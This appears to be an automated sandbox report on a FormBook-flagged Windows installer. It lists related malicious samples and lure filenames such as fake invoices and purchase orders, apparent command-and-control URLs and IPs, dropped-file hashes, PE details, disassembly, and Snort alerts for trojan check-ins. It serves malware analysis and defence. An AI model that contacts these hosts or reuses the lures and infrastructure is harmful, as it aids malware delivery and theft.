                                                                      • www.physicalrobot.com/evpn/?Y2MtLLPX=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB+xjvwGDX3fv&Ezu=UVFpYz0hIPjtGvD
                                                                      | P.O_RFQ0098765434.xlsx | Get hash | malicious | Browse
                                                                      • www.nicemoneymaker.com/vu9b/?sHt=b7gOWZrD8qwbyxlMHuxkPT+vPN2LggkC47M37787EsPYtH+BJepWOQQqpQFMdl/1WqGQQA==&Ab=gXuD_lh8bBV4p0A
                                                                      | MACHINE SPECIFICATION.exe | Get hash | malicious | Browse
                                                                      • www.vehcimbev.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=ZoyK93BFZg5bhToKNkvS+4H3u7vdriErK6KdZz21IbWYfqVPSHFlcVcSgcySxB5KZp6z
                                                                      | SOA.scr.exe | Get hash | malicious | Browse
                                                                      • www.quickshop.xyz/edbs/?1bJ=Fxo0jXLhpT&jpTd3Lg=Xf0AsKcEcxS6VBzv6eMId9BOKf3y7pEXXtGVhjSx+HGa1oGNkidRGQ2YsckjNlg0L7MJ
                                                                      | Item pending delivery - Final attempt to reach you.exe | Get hash | malicious | Browse
                                                                      • www.justcleanandgo.com/jpx/?iDHhJJrP=mcSXJ9rzsahvcQNLt2XcaIdq2nh7WmHXrWVcKt4m89SwRwN6h9IEoO42kLqyr3q6izAk&SZ=NZKxbfDht0
                                                                      | New Order.xlsx | Get hash | malicious | Browse
                                                                      • www.physicalrobot.com/evpn/?RB=mJ1WicGlY2GmPPBqg48PwwH9NxkuMiIXMjd/3ZNeMhMeYAPtqYgseV4kCY9lkBSICRrYBg==&qDH4D=f8c0xBrPYP1xE
                                                                      | TT Remittance Copy.PDF.exe | Get hash | malicious | Browse
                                                                      • www.nastablecoin.com/ihmh/?wP9=9xrH76mdfDx9iKgvbvU3vEebTN88KEv9G+0YP+1kUawk0yQyRcbX9OOF804+QBd5YfcY&lZQ=7nbLunBhP
                                                                      | DK Purchase Order 2021 - 00041.exe | Get hash | malicious | Browse
                                                                      • www.cheaperwhere.com/vsk9/?llsp=gTULpTwpERQd0J&GFQH8=K4sIljGD/ZBOPUB8FLFNbj9uZxc3ZJvuM8iCQMLCZdHLzRlSgIHR4yh57xtFQTRa05hO
                                                                      | mar2403.xlsx | Get hash | malicious | Browse
                                                                      • www.aideliveryrobot.com/p2io/?sFQ=jva0mvb0GZ&2dz=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==
                                                                      | Shipping Documents.exe | Get hash | malicious | Browse
                                                                      • www.lestraiteurs.com/6axz/?xpU8Zp=7MONd/FiZVU6hLmzueAQShD5Kj7vy2wgxhD7jfE2wAKraLqkxH1+E5WK2IUxaYLA58eG&et-=XPJpA2ZHxx5p-46P
                                                                      | NEW ORDER_PDF.exe | Get hash | malicious | Browse
                                                                      • www.women-un-wine.com/s8ri/?bl=UTChTb0hUjYl5Vd&Y2JpVVJ=ik96MuvU6sYHkk2HN3ePINIdN/MNv9yO6baBAgtLmrjKnPOCk7v5WH2NHL0PYI9oO8wm
                                                                      | PO TM-3851 ,BT-4792 RS-70100.xlsx | Get hash | malicious | Browse
                                                                      • www.droneserviceshouston.com/nsag/?NreT=TqyY/GEOSDxjH7dQORdFyQRMdddqkM/uWsPloTk7EWU4HGwS0QcF8O2ZiGzuNHKZm7WqDA==&qH40b=D2MxU0_h3nMhNt

                                                                      Domains

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                      www.jcernadas.com | Shipping Documents.xlsx | Get hash | malicious | Browse
                                                                      • 52.217.8.51
                                                                      | Invoice No. 21SWZ020.exe | Get hash | malicious | Browse
                                                                      • 52.217.37.211
                                                                      | igPVY6UByI.exe | Get hash | malicious | Browse
                                                                      • 52.217.65.131
                                                                      shops.myshopify.com | AQJEKNHnWK.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | New Order.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | payment.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | BL836477488575.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | Order.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | PO.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | PO91361.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | RFQ11_ZIM2021pdf.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | 1517679127365.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | W88AZXFGH.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | PaymentInvoice.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | PI 04-02-21.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | P1 032021.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | PDF NEW P.OJerhWEMSj4RnE4Z.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | bank details.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | PURCHASE ORDER _675765000.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | YMvYmQQyCz4gkqA.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | yQh96Jd6TZ.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74
                                                                      | Swift.exe | Get hash | malicious | Browse
                                                                      • 23.227.38.74

                                                                      ASN

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                      AMAZON-02US | 1wOdXavtlE.exe | Get hash | malicious | Browse
                                                                      • 52.216.179.59
                                                                      | hvEop8Y70Y.exe | Get hash | malicious | Browse
                                                                      • 15.165.26.252
                                                                      | 8sxgohtHjM.exe | Get hash | malicious | Browse
                                                                      • 3.13.255.157
                                                                      | eQLPRPErea.exe | Get hash | malicious | Browse
                                                                      • 13.248.216.40
                                                                      | vbc.exe | Get hash | malicious | Browse
                                                                      • 3.13.255.157
                                                                      | o2KKHvtb3c.exe | Get hash | malicious | Browse
                                                                      • 18.218.104.192
                                                                      | Order Inquiry.exe | Get hash | malicious | Browse
                                                                      • 3.14.206.30
                                                                      | 6IGbftBsBg.exe | Get hash | malicious | Browse
                                                                      • 104.192.141.1
                                                                      | nicoleta.fagaras-DHL_TRACKING_1394942.html | Get hash | malicious | Browse
                                                                      • 52.218.213.96
                                                                      | PaymentAdvice.exe | Get hash | malicious | Browse
                                                                      • 3.14.206.30
                                                                      | ikoAImKWvI.exe | Get hash | malicious | Browse
                                                                      • 104.192.141.1
                                                                      | BL01345678053567.exe | Get hash | malicious | Browse
                                                                      • 3.14.206.30
                                                                      | AL JUNEIDI LIST.xlsx | Get hash | malicious | Browse
                                                                      • 65.0.168.152
                                                                      | DYANAMIC Inquiry.xlsx | Get hash | malicious | Browse
                                                                      • 65.0.168.152
                                                                      | Statement of Account.xlsx | Get hash | malicious | Browse
                                                                      • 15.165.26.252
                                                                      | Shipping Documents.xlsx | Get hash | malicious | Browse
                                                                      • 52.217.8.51
                                                                      | bmws51TeIm.exe | Get hash | malicious | Browse
                                                                      • 3.141.177.1
                                                                      | Receipt779G0D675432.html | Get hash | malicious | Browse
                                                                      • 52.219.97.138
                                                                      | PaymentAdvice-copy.htm | Get hash | malicious | Browse
                                                                      • 52.51.245.167
                                                                      | Documents_460000622_1464906353.xls | Get hash | malicious | Browse
                                                                      • 52.12.4.186
                                                                      GD-EMEA-DC-CGN1DE | AVRJERqIh4.exe | Get hash | malicious | Browse
                                                                      • 80.67.16.8
                                                                      | igPVY6UByI.exe | Get hash | malicious | Browse
                                                                      • 80.67.16.8
                                                                      | TaTYytHaBk.exe | Get hash | malicious | Browse
                                                                      • 134.119.32.208
                                                                      | 530000.exe | Get hash | malicious | Browse
                                                                      • 141.0.20.5
                                                                      | RFQ 117839 ASIA TRADING LLC.xlsx | Get hash | malicious | Browse
                                                                      • 80.67.16.8
                                                                      | M0uy4pgQzd.exe | Get hash | malicious | Browse
                                                                      • 80.67.16.8
                                                                      | inn.exe | Get hash | malicious | Browse
                                                                      • 80.67.16.8
                                                                      | h3dFAROdF3.exe | Get hash | malicious | Browse
                                                                      • 92.204.33.8
                                                                      | P0_4859930058_NEW_0RDER.xlsx | Get hash | malicious | Browse
                                                                      • 92.204.33.8
                                                                      | #Uc708#Ub3c4#Uc6b0_7_#Uacc4#Uc0b0#Uae30 (41 zc9iTHdhxUjXnIh3Y gstE6IT6r9qBBG).js | Get hash | malicious | Browse
                                                                      • 134.119.244.148
                                                                      | #Uc708#Ub3c4#Uc6b0_7_#Uacc4#Uc0b0#Uae30 (41 zc9iTHdhxUjXnIh3Y gstE6IT6r9qBBG).js | Get hash | malicious | Browse
                                                                      • 134.119.244.148
                                                                      | script.exe.7582a080.0x0000000002360000-0x0000000002401fff.exe | Get hash | malicious | Browse
                                                                      • 134.119.246.152
                                                                      | app.exe.exe | Get hash | malicious | Browse
                                                                      • 80.67.16.8
                                                                      ANONYMIZEEpikNetworkCH | Shipping Documents.xlsx | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | W88AZXFGH.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | Invoice No. 21SWZ020.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | igPVY6UByI.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | New Order.xlsx | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | MACHINE SPECIFICATION.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | PO_210316.exe.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | purchase order PO#00011.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | PO_210301.exe.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | PO_210224.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | 8nxKYwJna8.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | SecuriteInfo.com.generic.ml.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | EK6BR1KS50.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | FHT210995.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | TEC20201601.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | SUNEJ PAYMENT.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | JAAkR51fQY.exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | Order_385647584.xlsx | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | Order (2021.01.06).exe | Get hash | malicious | Browse
                                                                      • 45.88.202.115
                                                                      | INVOICE AMAZON.vbs | Get hash | malicious | Browse
                                                                      • 45.88.202.111

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                      C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll | Shipping Documents.xlsx | Get hash | malicious | Browse

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\8r2vcudkhpr92uroe
                                                                        Process:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):164864
                                                                        Entropy (8bit):7.998873219224064
                                                                        Encrypted:true
                                                                        SSDEEP:3072:nn20w7MzJn8Ecdxmy/6K7X/K8XKumqOiP/3DEruScsOAvVm1rwTsRftlP5zVrCyO:n20Tzedxb6K7/6uQ6H6Vm12WJVjgBH5
                                                                        MD5:2DD0138B0F20AE5AC7177A1F06D6B8F0
                                                                        SHA1:C52CDC7ED9BF9F9083647E38A346A904C2EC2E71
                                                                        SHA-256:ABA2394C512FB8E15455DCCA08EFEE65851770AAD3E7BD893722B9D8AFA4FC82
                                                                        SHA-512:5811FF52CC20674803B71283DFBC428CC3879C5D3CEB650783D6F7C3DCD337D06B1B4607219E82B902A542B74ACDADD0D337245B21364A0F43C895140AE20112
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: .VE!1N..s..o.k......p.L.O.7$.R.s.A.v..T8.....4..@........ZC.)..r.S>...S ....q...f.g..\......&.....Y..Mj.3-.... ....tw........Ho.A.\[..@c4.-2..6,T...e.s.P....f*....A.]DHo.L......>P.Y=.....t.K{..!.6.9l...\.....:.".D......X......%.b.{..5)]..`)B=.+........O.^.c,pw.j....c9..+.fjX....43...W..L..?&...^.J.A..=O.#..y....Mv...a.v.....Q.">.0..w.|!.+.vc...{.n....qk..-./....`....+L{......Z...].=..k..:...P.t....`.F~.$.6.:*|.0vw.Mr.._.}..w..w......2.\h0t5...o. ..(.m..V..G..?.HT.........P...6x..K...........:.9......!x.....l...P.g_..C..w...-o.e..Y(.N...g.....D...Y.+..../...KDx..0..Y....._..@.....>.z..o...?z.hy......6..XDO+r...,TG9..G.R...y$.J.wa`u..Oos;x5.=..I..R.5G.n"k..;#7.]....H(.@!m.....#.RU...idd.....H........iD..3..0i9..c~L-Z.Wy..&..yNub.. .Qn........ ...K6O...[..>...SF...o*.. 8.Y...D..{...'..s..W...>..M..}Z4.CUG7..(?y....sj+Z.[(..(..%k.1...^...~..n7.=.V.....@b[..4l@.Zx..4....=.f..=Bi.V...fj....;...p....f.o..x.].7.I...i+h.Q.up..>.}.J..8...KJ7./?.
                                                                        C:\Users\user\AppData\Local\Temp\ael13j4hp6ajgnz
                                                                        Process:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6661
                                                                        Entropy (8bit):7.95921652590791
                                                                        Encrypted:false
                                                                        SSDEEP:192:7gyrXJsdJ0Yu2/s21RhjaSWyBi4tubwh/0fPpiQRFunaVtKib8R:7xbJsdJRu2E2BjaSWutub20PpiQXunaU
                                                                        MD5:68AAAFB180E036036F4AF426F57AD27A
                                                                        SHA1:5175001491EEBB7EA7C719522B8763F35164DC39
                                                                        SHA-256:D7CB9EFD854CF198E0B97202303C5DD24168886C5BEB4979CA99F13CDD43B94C
                                                                        SHA-512:37693CE040DF7C3981A37639D3DC153A8CCC828A8F8DFAB9A34B8357D6B6AC9BDE1355BB7501B662EFF7323BD08D16DE5B7790F6C5C0FBC910ADBDFCBD51E9B6
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: s.}.h....Vl........*........3q.E.X.2..1.j.X.s..W....N.......e......<.{.3..Gl.....aM....o..F......o.~_.....y.nM(..dQ]*.!..~./*...|V0:]...!...w8.MC...<..p..k.VP...5....?..w5.S:4.U....|..!H`.5... H....U. ..O.A..y.:... ..Z7..g.*F...F..hm.5..<.{C....,..AFv.BUz. ...d....eBy._V.M......xa ..7.5=...H.%@._|i...Ih..!.28..........y.Y..Mp..Z.....B1zP]......*..............de.R...g&..Xy.K50....&.e.1..@6.....=..Eh.VP....5Im......V<..j......h..u.1>.a...V.l.....CXdC..y.|..5.mQB.......!4.$.5e_z..(,...#..R.zV.K..<f...Hd.g...[^u.&....6N.A..o.<'....j......]q....}..ND...K....B..n:{..V7.AYG..m.4 Y....u<xN......V.7.a...enM...{[.....M...;..q`...0..'.s..G.MCE............../...G).......q...8A^.E.-....(d....0j...9|.+...G..^.....4..DpAB..j..>....O...O8..slK.a;B.1../..{j..L.b.|.....-..E.a.Lf.1..<u.>.......4z|.. .D).kdV.....{...Y.Y.<. ..N.....+Fg..Y~..6._$..0;...M(..(.\./{a~%<W.u:.tU.z.......D...@6h.[.ZT.B~Y..6.u......e..3C....p...S.........}(i..G..q...*2y|...8....5W..0Z.-m.%
                                                                        C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                        Process:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5120
                                                                        Entropy (8bit):4.166853769661324
                                                                        Encrypted:false
                                                                        SSDEEP:48:StR2JALQKHIPA15PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqSrS:EHL1IkYLlIhGXHBgVueKx
                                                                        MD5:41F5D6CADD673464980F0835B0801D4D
                                                                        SHA1:6753C31B14C5CFA9F3BCF8D05DB35554BE80BA68
                                                                        SHA-256:491AB0BE0C90490BDC145350F86ED973C715DC2F9236D0BEB1A7E6EF8D04A4E8
                                                                        SHA-512:D61D598894350C5497DB9419678CA63705E64F3B4368DA1675ACD8E7DDF141B6C6D6CCC0AC821CF07F3464A2285DF95617E4A7BC1A8390CB46567D360B645210
                                                                        Malicious:false
                                                                        Joe Sandbox View:
                                                                        • Filename: Shipping Documents.xlsx, Detection: malicious
                                                                        Reputation:low
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...NUn`...........!......................... ...............................`............@.........................0!..T...p".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.906066510460472
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:TazxfJHRhq.exe
                                                                        File size:207024
                                                                        MD5:f818665dd48a93c48255d3ceadf92a6e
                                                                        SHA1:2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
                                                                        SHA256:6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
                                                                        SHA512:ab05d43f21ca306ce3f0ab580206ef992fa7f004de21a15738448603e96213b16dd76c8e45fd625ed1c9c894ceded6fdfa8eca21874c405e9acc0fe84e961f4c
                                                                        SSDEEP:6144:Hd99R20Tzedxb6K7/6uQ6H6Vm12WJVjgBHd:n9DzyxTSuQGUd
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                                                        File Icon

                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x40314a
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 0000017Ch
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        xor esi, esi
                                                                        push edi
                                                                        mov dword ptr [esp+18h], esi
                                                                        mov ebp, 00409240h
                                                                        mov byte ptr [esp+10h], 00000020h
                                                                        call dword ptr [00407030h]
                                                                        push esi
                                                                        call dword ptr [00407270h]
                                                                        mov dword ptr [007A3030h], eax
                                                                        push esi
                                                                        lea eax, dword ptr [esp+30h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push esi
                                                                        push 0079E540h
                                                                        call dword ptr [00407158h]
                                                                        push 00409230h
                                                                        push 007A2780h
                                                                        call 00007F77F8BC53D8h
                                                                        mov ebx, 007AA400h
                                                                        push ebx
                                                                        push 00000400h
                                                                        call dword ptr [004070B4h]
                                                                        call 00007F77F8BC2B19h
                                                                        test eax, eax
                                                                        jne 00007F77F8BC2BD6h
                                                                        push 000003FBh
                                                                        push ebx
                                                                        call dword ptr [004070B0h]
                                                                        push 00409228h
                                                                        push ebx
                                                                        call 00007F77F8BC53C3h
                                                                        call 00007F77F8BC2AF9h
                                                                        test eax, eax
                                                                        je 00007F77F8BC2CF2h
                                                                        mov edi, 007A9000h
                                                                        push edi
                                                                        call dword ptr [00407140h]
                                                                        call dword ptr [004070ACh]
                                                                        push eax
                                                                        push edi
                                                                        call 00007F77F8BC5381h
                                                                        push 00000000h
                                                                        call dword ptr [00407108h]
                                                                        cmp byte ptr [007A9000h], 00000022h
                                                                        mov dword ptr [007A2F80h], eax
                                                                        mov eax, edi
                                                                        jne 00007F77F8BC2BBCh
                                                                        mov byte ptr [esp+10h], 00000022h
                                                                        mov eax, 00000001h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                        Data Directories

                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x900 | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                        Sections

                                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        .text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc | 0x3ac000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        Name | RVA | Size | Type | Language | Country
                                                                        RT_ICON | 0x3ac190 | 0x2e8 | data | English | United States
                                                                        RT_DIALOG | 0x3ac478 | 0x100 | data | English | United States
                                                                        RT_DIALOG | 0x3ac578 | 0x11c | data | English | United States
                                                                        RT_DIALOG | 0x3ac698 | 0x60 | data | English | United States
                                                                        RT_GROUP_ICON | 0x3ac6f8 | 0x14 | data | English | United States
                                                                        RT_MANIFEST | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                        Imports

                                                                        DLL | Import
                                                                        KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                        USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                        GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                        SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                        ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                        COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                        ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
                                                                        VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                        Possible Origin

                                                                        Language of compilation system | Country where language is spoken
                                                                        English | United States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                        04/08/21-11:10:06.077676 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        04/08/21-11:11:04.291694 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49744 | 34.102.136.180 | 192.168.2.3
                                                                        04/08/21-11:11:09.627646 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.3 | 192.185.48.194
                                                                        04/08/21-11:11:09.627646 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.3 | 192.185.48.194
                                                                        04/08/21-11:11:09.627646 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.3 | 192.185.48.194
                                                                        04/08/21-11:11:14.966415 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49746 | 34.102.136.180 | 192.168.2.3
                                                                        04/08/21-11:11:20.052568 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 52.58.78.16
                                                                        04/08/21-11:11:20.052568 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 52.58.78.16
                                                                        04/08/21-11:11:20.052568 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 52.58.78.16
                                                                        04/08/21-11:11:30.573548 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49749 | 23.227.38.74 | 192.168.2.3

                                                                        Network Port Distribution

                                                                        TCP Packets

